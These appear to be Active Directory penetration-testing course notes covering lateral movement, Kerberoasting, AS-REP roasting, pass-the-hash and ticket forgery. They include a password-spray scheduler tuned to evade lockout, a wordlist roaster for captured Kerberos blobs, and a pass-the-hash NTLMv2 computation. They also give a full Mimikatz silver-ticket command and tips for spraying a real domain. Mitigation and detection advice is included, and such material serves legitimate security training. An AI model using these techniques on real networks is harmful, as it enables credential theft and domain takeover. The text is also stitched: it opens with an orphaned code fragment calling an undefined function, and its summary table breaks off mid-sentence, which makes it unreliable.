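def server_verify(stored_nt_hash: bytes, user: str, domain: str,
                  server_challenge: bytes, nt_challenge_response: bytes) -> bool:
    """Server side: recompute NTProofStr from the stored hash and compare in constant time."""
    nt_proof, blob = nt_challenge_response[:16], nt_challenge_response[16:]
    expected = hmac.new(ntowf_v2(stored_nt_hash, user, domain), server_challenge + blob, hashlib.md5).digest()
    return hmac.compare_digest(expected, nt_proof)


# Constructed values (not derived from any real account).
NT_HASH = bytes(range(16))
SERVER_CHALLENGE = b"\x11" * 8
CLIENT_CHALLENGE = b"\x22" * 8
TIMESTAMP = 0x01DBAD0000000000  # FILETIME-style value, arbitrary


def run_exchange(nt_hash: bytes = NT_HASH, stored_hash: bytes = NT_HASH,
                 server_challenge: bytes = SERVER_CHALLENGE) -> bool:
    """One full exchange; returns the server's accept/reject decision."""
    blob = build_blob(CLIENT_CHALLENGE, TIMESTAMP)
    response = ntlmv2_response(nt_hash, "alice", "CORP", server_challenge, blob)
    return server_verify(stored_hash, "alice", "CORP", server_challenge, response)


if __name__ == "__main__":
    print("correct hash accepted:", run_exchange())
    print("wrong hash accepted:", run_exchange(nt_hash=b"\xff" * 16))
```

Two things the code makes visible: a captured response does not verify against a different server challenge, which is the replay protection the notes mention, and the only secret the server ever needs is the stored hash, which is why protecting LSASS and the SAM/NTDS stores matters as much as protecting passwords.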

DEMO: No access

Pass-the-Hash With WMIExec

WMI allows administrators to perform various tasks like:
• Gathering system information
• Executing scripts
• Controlling system operations

⚠️ Works on port 135 TCP

Dynamic RPC Ports: After connecting to port 135, the communication is redirected to a dynamically assigned RPC port. These dynamic ports typically fall within the range of 49152–65535, though this range can be customized through Group Policy or registry settings.

WMIExec is a technique used to execute commands or scripts on remote Windows systems via WMI.
In the context of lateral movement, wmiexec provides a way for attackers or penetration testers to interact with remote systems without requiring additional services or software installations.

How it works
WMI: a framework that allows interaction with system components and management of various tasks on Windows systems.
DCOM and RPC: WMI operates over Distributed Component Object Model (DCOM) and Remote Procedure Call (RPC), allowing remote communication with Windows systems.
Remote Command Execution: wmiexec uses WMI to remotely execute commands or scripts on a target system. It does so by sending a WMI request to execute a command, and then retrieves the output from the remote system.

Lateral Movement with WMIExec

Remote Command Execution
wmiexec allows execution of commands on remote systems, providing a method to interact with and manipulate the target system.
Privilege Escalation
wmiexec can be used to execute commands with elevated privileges, potentially allowing attackers to escalate their access rights on the remote system.
Minimal Footprint
wmiexec does not require additional software installations or creating new services. This minimal footprint makes it less detectable and can bypass certain security controls. The ability to execute commands without leaving extensive traces makes it attractive for lateral movement.

Tools
• Impacket
• CrackMapExec
• Custom Scripts

DEMO: No access

DEMO: No access

DEMO: No access

SSH Tunneling
SSH tunneling, also known as SSH port forwarding, is a technique that uses Secure Shell (SSH) to create encrypted tunnels for network traffic.

💡 It allows users to securely forward data through an SSH connection

SSH tunneling, in the context of pivoting, refers to a technique used to create secure tunnels through Secure Shell (SSH) connections that allow attackers or penetration testers to access other systems or network segments.

SSH Tunneling Techniques

Local Port Forwarding: Local port forwarding redirects traffic from a local port on the client system to a specified port on the remote system. This allows creating secure tunnels to internal resources.

💡 In case of pivoting: local port forwarding can be used to connect to internal services on a compromised system.

Remote Port Forwarding: Remote port forwarding allows traffic from a port on the remote system to be forwarded to a specified port on the local system. This technique is useful for enabling remote access or establishing backdoors.

💡 In case of pivoting: Remote port forwarding can be used to create a tunnel that allows remote systems to connect to internal resources via a compromised system.

Dynamic Port Forwarding: Dynamic port forwarding creates a SOCKS proxy, allowing flexible port forwarding based on client requests. This is useful for tunneling various types of traffic through the SSH connection.

💡 In case of pivoting: Dynamic port forwarding can be used to create a SOCKS proxy, enabling flexible tunneling.

DEMO: No access

DEMO: No access

DEMO: No access

Active Directory Penetration Testing

Active Directory
Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.

💡 It serves as a centralized repository for managing and organizing information about network resources like users, computers, groups, etc.

Use Cases
• User Authentication and Authorization: AD serves as a central authentication and authorization mechanism. Example: Users can log into their computer using AD credentials.
• Resource Management: It enables administrators to efficiently manage and organize network resources like computers, printers, shared folders and applications.
• Group Policy Management: AD allows administrators to define and enforce security policies, configurations and settings across all domain-joined devices.
• Directory Services: It provides a hierarchical structure for organizing objects within the network, making it easier to locate and manage resources.
• Domains: A domain is a logical grouping of network objects that share a common directory database and security policies.
• Domain Controllers (DCs): Domain Controllers are servers that manage access to the resources within a domain. They store a replica of the Active Directory database, authenticate user logins, enforce security policies, and replicate changes to other domain controllers within the domain.
• Organizational Units (OUs): OUs are containers within a domain that allow administrators to organize and manage objects more effectively.
• Forest: A forest is a collection of one or more domains that share a common schema, configuration and global catalog.
• Global Catalog (GC): The GC is a distributed data repository that contains a partial replica of all objects in the forest. It facilitates cross-domain searches and enables users to locate resources across the entire Active Directory forest.
• Trust Relationships: Trust relationships define how authentication and authorization are extended between domains within a forest or between separate forests.

Users, Groups & Computers

Users represent individuals who interact with the network. Each user has a unique account within Active Directory, identified by a username and associated with a password.

☝ Administrators can manage user accounts by creating, modifying, or deleting them using Active Directory management tools.
They can also assign permissions, group memberships, and other settings to control user access to network resources.

Groups are collections of user accounts, computer accounts or other groups in AD.
There are two main types of groups in AD:
• Security Groups: Security groups are used to manage access permissions to network resources. Users can be added to security groups, and permissions can be assigned to these groups to control resource access.

Security Group Azure AD (figure)

• Distribution Groups: Distribution groups are used for sending email messages to a group of recipients. They do not have security-related permissions and are primarily used for email distribution purposes.

Computers represent physical or virtual devices that are joined to the Active Directory domain. This includes workstations, servers, laptops, and other network devices.

DEMO (not lab): No access

Organizational Units
OUs are containers within an AD domain used to organize and manage objects such as user accounts, computer accounts, groups and other OUs.
Difference between OUs & Security Groups

OU vs Security Group
• OUs are used for organizing and managing objects within Active Directory. Security Groups are used for access control and permissions management.
• OUs create a hierarchical structure for organizing objects. Security Groups can be organized in a flat structure.
• OUs are containers for objects within Active Directory and can contain other OUs. Security Groups are collections of users, computers, or other groups.

DEMO (not lab): No access

Active Directory Authentication

Active Directory authentication is the process by which users and computers verify their identities to gain access to network resources within an AD domain.
The authentication protocols are:

• Kerberos: the primary authentication protocol used by AD.
How it works
◦ When a user attempts to log in, their client computer requests a Ticket Granting Ticket (TGT) from the Key Distribution Centre (KDC), which is typically a domain controller.
◦ The DC verifies the user's credentials and issues a TGT if authentication is successful.
◦ The TGT is then used to obtain Service Tickets for accessing specific network resources.
Features:
◦ Mutual Authentication: both the client and the server verify each other's identities.
◦ SSO: Users authenticate once and can access multiple resources without re-entering credentials.
◦ Ticket-based: authentication exchanges rely on encrypted tickets, reducing the risk of credential theft.

Kerberos authentication (figure)

KERBEROS DELEGATION (figure)


• NTLM: an older authentication protocol used by Windows systems for backward compatibility.
How it works
◦ When a user attempts to log in, their client computer sends a hashed version of their password to the server.
◦ The server compares the hash to the stored hash of the user's password.
◦ If the hashes match, authentication is successful.
Features:
◦ Compatibility: NTLM is supported by older Windows systems and applications.
◦ Simplicity: NTLM authentication does not require the complexity of Kerberos, making it easier to implement in certain environments.
◦ Security: NTLM has security limitations compared to Kerberos, including susceptibility to pass-the-hash attacks and lack of mutual authentication.

Trees, Forests & Trusts (figure)

Forest (figure)

trust forest (figure)

AD Penetration Testing Methodology

Active Directory (AD) penetration testing is a security assessment process aimed at evaluating the security posture of an organization's Active Directory infrastructure.

Killchain (figure)

Methodology (figure)


Techniques

Breaching AD
- Password Spray
- Brute Force Attack
- Phishing
- Poisoning

AD Enumeration
- PowerView: AD objects, attributes, and permissions
- BloodHound: Visualize and analyze AD permissions, group memberships, and attack paths
- LDAP Enumeration: Query the AD LDAP service to retrieve detailed information about users, groups, computers, and OUs

Privilege Escalation
- Kerberoasting: Kerberoasting is a Kerberos attack that targets service accounts to obtain their encrypted service account passwords
- AS-REP Roasting: AS-REP roasting is a Kerberos authentication attack that targets user accounts with the "Do not require Kerberos preauthentication" attribute set

Lateral Movement
- Pass-the-Hash: Use stolen password hashes to authenticate and gain access to other systems without knowing the plaintext passwords.
- Pass-the-Ticket (PtT): A technique used in Active Directory environments to authenticate to other systems or services using stolen Kerberos ticket-granting tickets (TGTs) or service tickets without knowing the user's plaintext password.

Persistence
- Silver Ticket: A Silver Ticket attack is a technique used in Active Directory (AD) environments to impersonate any service or computer account by forging Kerberos service tickets without the need to obtain the account's plaintext password.
- Golden Ticket: Golden ticket attacks involve forging Kerberos tickets for arbitrary users, allowing attackers to impersonate any user and access any resource within the AD environment.

💡 Important references
ocd-mindmaps Welcome to Orange Cyberdefense mindmaps

Password Spray
Password spraying is an attack technique in which an adversary attempts to compromise user accounts by trying to authenticate with a curated list of passwords that are either frequently used or likely to be used by the target. Unlike brute force, which throws many passwords at one account, spraying tries one or a few passwords against many accounts and pauses between rounds, so no account reaches the lockout threshold.
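The following is an added example, not course material: a spray scheduler run against a constructed in-memory directory that enforces a lockout policy the way a DC tracks badPwdCount. Everything here (accounts, passwords, the 5-attempt / 30-minute policy, and the `Directory.authenticate` stand-in for a real Kerberos, SMB or OWA login) is constructed; the contrast with `brute_force` shows why the pause between rounds is what keeps the accounts unlocked.

```python
"""Lockout-aware password spraying against a constructed in-memory directory.

Added illustration, not course material. Accounts, passwords and the lockout
policy are constructed; Directory.authenticate stands in for a real endpoint
(Kerberos pre-authentication, SMB, OWA, ...).
"""
from __future__ import annotations
from dataclasses import dataclass

# Constructed policy matching common AD defaults (what `net accounts /domain`
# reports): lock after 5 bad attempts, badPwdCount resets after 30 minutes.
LOCKOUT_THRESHOLD = 5
OBSERVATION_WINDOW = 30 * 60  # seconds


@dataclass
class Account:
    password: str
    bad_count: int = 0
    last_bad: float = 0.0
    locked: bool = False


class Directory:
    """Stand-in for a DC: tracks badPwdCount and lockout state per account."""

    def __init__(self, users: dict[str, str]):
        self.accounts = {u: Account(p) for u, p in users.items()}

    def authenticate(self, user: str, password: str, now: float) -> bool:
        acct = self.accounts[user]
        if acct.locked:
            return False
        if now - acct.last_bad >= OBSERVATION_WINDOW:
            acct.bad_count = 0  # observation window elapsed, counter resets
        if acct.password == password:
            acct.bad_count = 0
            return True
        acct.bad_count += 1
        acct.last_bad = now
        if acct.bad_count >= LOCKOUT_THRESHOLD:
            acct.locked = True
        return False


def password_spray(directory: Directory, users: list[str], passwords: list[str],
                   threshold: int, window: float) -> dict[str, str]:
    """One password across all users per round; after threshold-1 rounds, wait
    out the observation window. No account ever reaches the lockout threshold.
    Returns {user: password} for each valid pair found."""
    found: dict[str, str] = {}
    clock = 0.0
    for i, pw in enumerate(passwords, start=1):
        for user in users:
            if user not in found and directory.authenticate(user, pw, clock):
                found[user] = pw
        if i % (threshold - 1) == 0:
            clock += window  # sleep past the window before the next batch
    return found


def brute_force(directory: Directory, user: str, passwords: list[str]) -> str | None:
    """Contrast: the same wordlist thrown at one account with no pause."""
    for pw in passwords:
        if directory.authenticate(user, pw, 0.0):
            return pw
    return None


def demo() -> dict[str, str]:
    # Constructed sample: two users with guessable passwords, two with strong ones.
    directory = Directory({"alice": "Spring2024!", "bob": "Xq9$v!2pLm#Tz",
                           "carol": "Company123", "dave": "Rz7&kP0@wN4u"})
    wordlist = ["Password1", "Welcome1", "Spring2024!", "Company123", "Summer2024!", "Password123"]
    found = password_spray(directory, list(directory.accounts), wordlist,
                           LOCKOUT_THRESHOLD, OBSERVATION_WINDOW)
    assert not any(a.locked for a in directory.accounts.values())
    return found


if __name__ == "__main__":
    print(demo())
```

Against a real domain, read the effective policy first (`net accounts /domain`, and any fine-grained password policies applied to the target groups, which can be stricter than the domain default) and size the rounds from those values rather than the constants above.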


DEMO: No access

AD Enumeration: BloodHound
Active Directory (AD) reconnaissance is a crucial step in assessing the security of
an Active Directory environment.

BloodHound is a powerful tool for conducting such reconnaissance activity.


BloodHound uses graph theory to reveal the hidden and often unintended
relationships within an Active Directory or Azure environment.

💡 Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.

DEMO: No access

AD Enumeration: PowerView
DEMO: No access

AS-REP Roasting - Privilege Escalation


AS-REP Roasting is a technique that exploits a weak configuration of Kerberos authentication.
In the Kerberos protocol, when a user wants to authenticate, the client sends an Authentication Service Request (AS-REQ) to the KDC. The Key Distribution Center then responds with an Authentication Service Reply (AS-REP), which contains a Ticket Granting Ticket (TGT) and an encrypted part (including the session key) protected with the user's password-derived key.


💡 AS-REP Roasting takes advantage of the fact that some user accounts in Active Directory have the "Do not require Kerberos preauthentication" option enabled. Pre-authentication normally forces the client to prove knowledge of its key first (an encrypted timestamp in the AS-REQ). Without it, anyone on the network can request an AS-REP for that account, and because the reply's encrypted part is keyed with the user's password-derived key, the blob can be taken offline and cracked with a wordlist.

Hunting for users with that flag set (PowerView):

Get-DomainUser | Where-Object { $_.UserAccountControl -like "*DONT_REQ_PREAUTH*" }
Get-DomainUser -PreauthNotRequired   # PowerView shorthand for the same filter

Tool: Rubeus

DEMO: No access

Kerberoasting
Kerberoasting is a post-exploitation attack technique that requests Kerberos service tickets for Active Directory accounts that have a Service Principal Name (SPN) and cracks them offline to recover the account's password.

💡 The service ticket returned by the KDC is encrypted with a key derived from the password of the service account that owns the SPN (the NT hash itself when RC4-HMAC is used).
(An SPN is an attribute that ties a service to a user account within AD.)
Any authenticated domain user can request such a ticket; the adversary then works offline to crack it, typically with a wordlist or brute force.

Once the plaintext credentials of the service account are obtained, the adversary can impersonate the account and inherit access to any systems, assets or networks granted to the compromised account.

How it works
1. A threat actor compromises the account of a Domain User.
2. The threat actor uses the Domain User context to request Kerberos service tickets for the SPNs of interest from the ticket granting service (TGS), using tools like GhostPack's Rubeus or SecureAuth Corporation's [Link].
3. The threat actor receives a ticket from the Kerberos key distribution center (KDC). The ticket is encrypted with a key derived from the service account's password; when RC4-HMAC (etype 23) is negotiated that key is the NT hash itself, which is why tools request RC4 wherever the account still allows it.
4. The threat actor captures the TGS ticket and takes it offline.
5. The threat actor cracks the ticket to recover the service account's plaintext password, using tools like Hashcat (mode 13100 for RC4 tickets) or John the Ripper.
6. With the service account password in hand, the threat actor authenticates as the service account and is granted access to any service, network or system associated with the compromised account.
7. The attacker is then able to steal data, escalate privileges or set backdoors on the network to ensure future access.
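Why both AS-REP roasting (above) and Kerberoasting are offline attacks, as an added example that is not course material and not Rubeus, Impacket or hashcat code: a self-contained MD4 (for the NT hash) and the RC4-HMAC (RFC 4757) encryption a KDC applies to the enc-part of its reply, then a tiny "roaster" that tests a wordlist against the captured blob. The only difference between the two attacks at this layer is the Kerberos key-usage number. The account names, passwords, wordlist and plaintext are constructed.

```python
"""AS-REP roasting and Kerberoasting as offline attacks: the etype-23 (RC4-HMAC)
encrypted part of a KDC reply is keyed with the target account's NT hash, so a
captured blob can be tested against a wordlist with no further contact with the DC.
Added illustration, not course material and not Rubeus/Impacket/hashcat code.
"""
from __future__ import annotations
import hmac
import os
import struct
from hashlib import md5

MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib's md4 is often missing under OpenSSL 3."""
    def rotl(x, n): return ((x << n) | (x >> (32 - n))) & MASK
    def f(x, y, z): return (x & y) | (~x & z)
    def g(x, y, z): return (x & y) | (x & z) | (y & z)
    def h(x, y, z): return x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", 8 * len(data))
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    k3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):  # round 1
            t = (a + f(b, c, d) + x[i]) & MASK
            a, b, c, d = d, rotl(t, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            t = (a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & MASK
            a, b, c, d = d, rotl(t, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            t = (a + h(b, c, d) + x[k3[i]] + 0x6ED9EBA1) & MASK
            a, b, c, d = d, rotl(t, (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the account's RC4-HMAC Kerberos key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, md5).digest()


# Key usage numbers: 2 = ticket enc-part under the service key (what Kerberoasting
# cracks, hashcat 13100); 8 = AS-REP enc-part as Windows KDCs encrypt it (what
# AS-REP roasting cracks, hashcat 18200; RFC 4120 lists 3 for this field).
USAGE_TICKET, USAGE_AS_REP = 2, 8


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes | None = None) -> bytes:
    """RFC 4757 encryption as the KDC does it: checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    confounder = confounder or os.urandom(8)
    checksum = hmac_md5(k1, confounder + plaintext)
    return checksum + rc4(hmac_md5(k1, checksum), confounder + plaintext)


def rc4_hmac_decrypt(key: bytes, usage: int, blob: bytes) -> bytes | None:
    """Plaintext if the checksum verifies, None otherwise (wrong key or wrong usage)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum, body = blob[:16], blob[16:]
    data = rc4(hmac_md5(k1, checksum), body)
    return data[8:] if hmac.compare_digest(hmac_md5(k1, data), checksum) else None


def roast(blob: bytes, usage: int, wordlist: list[str]) -> str | None:
    """Offline crack: derive a key from each candidate and test the blob's checksum."""
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), usage, blob) is not None:
            return candidate
    return None


def demo() -> dict[str, str | None]:
    # Constructed victims: svc_sql owns an SPN (Kerberoast target), jdoe has
    # DONT_REQ_PREAUTH set (AS-REP roast target). Same primitive, different usage.
    victims = {"svc_sql": ("Summer2024!", USAGE_TICKET), "jdoe": ("Welcome1", USAGE_AS_REP)}
    wordlist = ["Password1", "Welcome1", "Spring2024!", "Summer2024!", "Autumn2024!"]
    results = {}
    for name, (password, usage) in victims.items():
        blob = rc4_hmac_encrypt(nt_hash(password), usage, b"constructed enc-part for " + name.encode())
        results[name] = roast(blob, usage, wordlist)
    return results


if __name__ == "__main__":
    print(demo())
```

Real `$krb5tgs$23$...` and `$krb5asrep$23$...` lines produced by Rubeus or Impacket carry exactly these two pieces, the 16-byte checksum and the RC4 ciphertext, which is what hashcat's checksum test recomputes per candidate. With AES etypes (17/18) the key is a PBKDF2 derivation with 4096 iterations instead of a single MD4, which is why forcing AES on service accounts makes the same attack orders of magnitude slower.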

🧱 How to prevent?
Service account passwords should be:
• Complex: 25 or more characters
• Random: no recognisable words, phrases or patterns
• Changed frequently: rotated every 30 days or less
Further measures:
• Prefer Group Managed Service Accounts (gMSA), which generate and rotate long random passwords automatically
• Disable RC4 for service accounts (msDS-SupportedEncryptionTypes restricted to AES) so that tickets cannot be cracked at RC4 speed
• Use MFA where the service supports it
• Integrate IAM (Identity and Access Management) to inventory and monitor service accounts
• Detect: alert on service ticket requests (Event ID 4769) with RC4 encryption (ticket encryption type 0x17) from accounts that do not normally use it
• Use BloodHound to identify all privileged service accounts and reduce their privileges

DEMO: No access

AD Lateral Movement: Pass-the-Hash - PtH


Pass-the-Hash is a credential theft technique primarily targeting Windows-based systems. The attacker obtains the NT hash of a user's password and uses it to authenticate as that user, bypassing the need for the plaintext password.


It typically starts with access to a compromised system from which the target user's NT hash can be obtained (LSASS memory, the local SAM, or a copy of NTDS.dit).
Once the hash is acquired, the attacker feeds it into the NTLM challenge-response exchange to authenticate to other systems in the AD domain; tools such as Mimikatz or Impacket accept the hash in place of a password. The same NT hash is also the RC4-HMAC Kerberos key, so it can be used to request a TGT (overpass-the-hash).
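The NTLM exchange described in the authentication section and the pass-the-hash point above, as an added example that is not course material: the NTLMv2 response is an HMAC keyed with the NT hash, so whoever holds the hash can answer the server's challenge exactly like the legitimate client, while a replayed response or a wrong hash is rejected. The NT hash constant is the published MS-NLMP test value for the password "Password" (MD4 of its UTF-16LE form, not derived here); the user/domain names, nonces, timestamp and target information are constructed, and the function names are this example's own.

```python
"""NTLMv2 challenge-response computed from the NT hash alone, which is all
pass-the-hash needs. Added illustration, not course material. The NT hash is
the MS-NLMP test value for the password "Password" (MD4 of its UTF-16LE form),
used here as a constant; nonces, timestamp and target info are constructed.
"""
import hmac
import struct
from hashlib import md5

# What the DC (or local SAM) stores and what an attacker dumps from LSASS:
NT_HASH = bytes.fromhex("a4f49c406510bdcab6824ee7c30fd852")  # NTOWFv1("Password")


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 hash (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over
    UPPER(user) || domain. The password never enters this computation."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), md5).digest()


def make_blob(timestamp: int, client_challenge: bytes, target_info: bytes) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE: version, reserved, FILETIME, nonce, reserved, AV pairs, reserved."""
    return (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def ntlmv2_response(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """Client side: NtChallengeResponse = NTProofStr || blob."""
    proof = hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + blob, md5).digest()
    return proof + blob


def server_verify(stored_nt_hash: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """Server side: recompute NTProofStr from the stored hash and the blob the client sent."""
    proof, blob = response[:16], response[16:]
    expected = hmac.new(ntowf_v2(stored_nt_hash, user, domain), server_challenge + blob, md5).digest()
    return hmac.compare_digest(proof, expected)


def av_pair(av_id: int, value: str) -> bytes:
    """One AV_PAIR of the CHALLENGE message's TargetInfo: AvId, AvLen, UTF-16LE value."""
    data = value.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(data)) + data


def demo() -> dict:
    user, domain = "User", "Domain"
    # Constructed CHALLENGE content: 8-byte server nonce and AV pairs
    # (MsvAvNbDomainName = 2, MsvAvNbComputerName = 1, MsvAvEOL = 0).
    server_challenge = bytes.fromhex("0123456789abcdef")
    target_info = av_pair(2, domain) + av_pair(1, "Server") + b"\x00\x00\x00\x00"
    blob = make_blob(timestamp=0, client_challenge=bytes.fromhex("aa" * 8), target_info=target_info)

    # The attacker holds only NT_HASH (dumped, never cracked) and answers the live challenge.
    pth = ntlmv2_response(NT_HASH, user, domain, server_challenge, blob)
    # Replaying that response against a fresh challenge fails: PtH is not a replay,
    # the attacker computes a new response each time, which the hash alone allows.
    fresh_challenge = bytes.fromhex("fedcba9876543210")
    # A guessed or wrong hash is rejected by the same check.
    wrong = ntlmv2_response(bytes(16), user, domain, server_challenge, blob)
    return {
        "pth_accepted": server_verify(NT_HASH, user, domain, server_challenge, pth),
        "replay_rejected": not server_verify(NT_HASH, user, domain, fresh_challenge, pth),
        "wrong_hash_rejected": not server_verify(NT_HASH, user, domain, server_challenge, wrong),
    }


if __name__ == "__main__":
    print(demo())
```

Nothing in `ntlmv2_response` needs the password, which is the whole reason hash theft is equivalent to credential theft under NTLM; the usual mitigations (Protected Users, Credential Guard, LAPS for local accounts, disabling NTLM where Kerberos works) all aim at making the hash unavailable or unusable rather than at the protocol math.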
DEMO: No access

AD Lateral Movement: Pass-the-Ticket - PtT


Pass the Ticket is a credential theft technique that enables adversaries to use
stolen Kerberos tickets to authenticate to resources (e.g., file shares and other
computers) as a user without having to compromise that user’s password.
Adversaries often use this technique to move laterally through an organization’s
network to hunt for opportunities to escalate their privileges or fulfil their
mission.
Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGT) can be
stolen and reused by adversaries. Without administrative privileges, an adversary
can obtain the TGT (using “fake delegation”) and all TGS tickets for the current
user.
DEMO: No access

AD Persistence: Silver Ticket


A Silver Ticket attack forges a valid service ticket (TGS) for one specific service once the password hash of the service account (often the computer account that hosts the service) has been obtained.
This gives unauthorized access to that service as any chosen user, because the service decrypts and trusts the ticket with its own key.
Adversaries capable of forging Silver Tickets create and use TGS tickets without interacting with the Key Distribution Center (KDC), so no ticket request is logged on the domain controllers, potentially making detection more challenging.


Invoke-Mimikatz -Command '"kerberos::golden /domain:[Link] /sid:S-1-5-21-1693200156-3137632808-1858025440 /target:[Link] /service:CIFS /rc4:d5f92467d4425e5f34fb55893e8a7768 /user:administrator /ptt"'

◦ /domain = the FQDN of the domain
◦ /sid = the SID of the domain
◦ /target = the FQDN of the target server
◦ /service = the target service name (here CIFS, the file-share service)
◦ /rc4 = the NTLM/RC4 password hash of the service account (here the target computer account)
◦ /user = the username to impersonate (can be fake too)
◦ /ptt = inject the forged ticket into the current session (pass-the-ticket)

DEMO: No access

AD Persistence: Golden Ticket


A Golden Ticket attack forges Kerberos TGTs using the key of the domain's krbtgt account (its NT hash or AES key), which the attacker obtains after compromising a domain controller, for example via DCSync or a copy of NTDS.dit.
Because every legitimate TGT is protected with that same key, the KDC accepts the forgery: the attacker can impersonate any user, claim any group membership (such as Domain Admins) and access any resource in the domain, bypassing normal authentication. The forged tickets remain usable until the krbtgt password has been rotated twice.
DEMO: No access

💡 Summary table of Active Directory Exploitation
Scarred Monk Active Directory Fundamentals (Part 1)- Basic Concepts

Technique: AS-REP Roasting
Brief description: an attack technique used to obtain the credentials of a user account in Active Directory environments by exploiting a weak configuration of the Kerberos protocol.
Misconfiguration: flag "Do not require Kerberos preauthentication" set on the account. Without this protection, the KDC (Key Distribution Center) sends an AS-REP (Authentication Service Response) directly to the requester without requiring pre-authentication.

Technique: Kerberoasting
Brief description: a widely used attack technique in Active Directory environments that abuses the Kerberos protocol to obtain the service credentials of a service account (SPN) with elevated privileges.
Misconfiguration: the attack exploits the fact that the service tickets issued for service accounts, in the form of …

Command & Control (C2/C&C)
Command and Control (C2) refers to the communication structure used by attackers to remotely control and coordinate activities across compromised systems.

💡 C2 enables attackers to send commands, receive data and manage their operations in a coordinated manner.
C2 frameworks allow red teams to orchestrate, control and coordinate multi-stage offensive operations, providing them with the tools to mimic real-world threat actors.

Role of C2
• Centralized Coordination: C2 frameworks provide a centralized point from which red teams can manage multiple compromised systems.
• Persistence and Remote Access: C2 allows red teams to establish and maintain persistence on compromised systems. It enables remote access, allowing red teams to interact with target systems, execute commands and carry out post-exploitation activities.
• Lateral Movement: C2 frameworks facilitate lateral movement across a network.
• Complex Attack Scenarios: C2 frameworks empower red teams to execute complex attack scenarios that span multiple stages.
• Testing Blue Team Detection and Response: C2 frameworks are instrumental
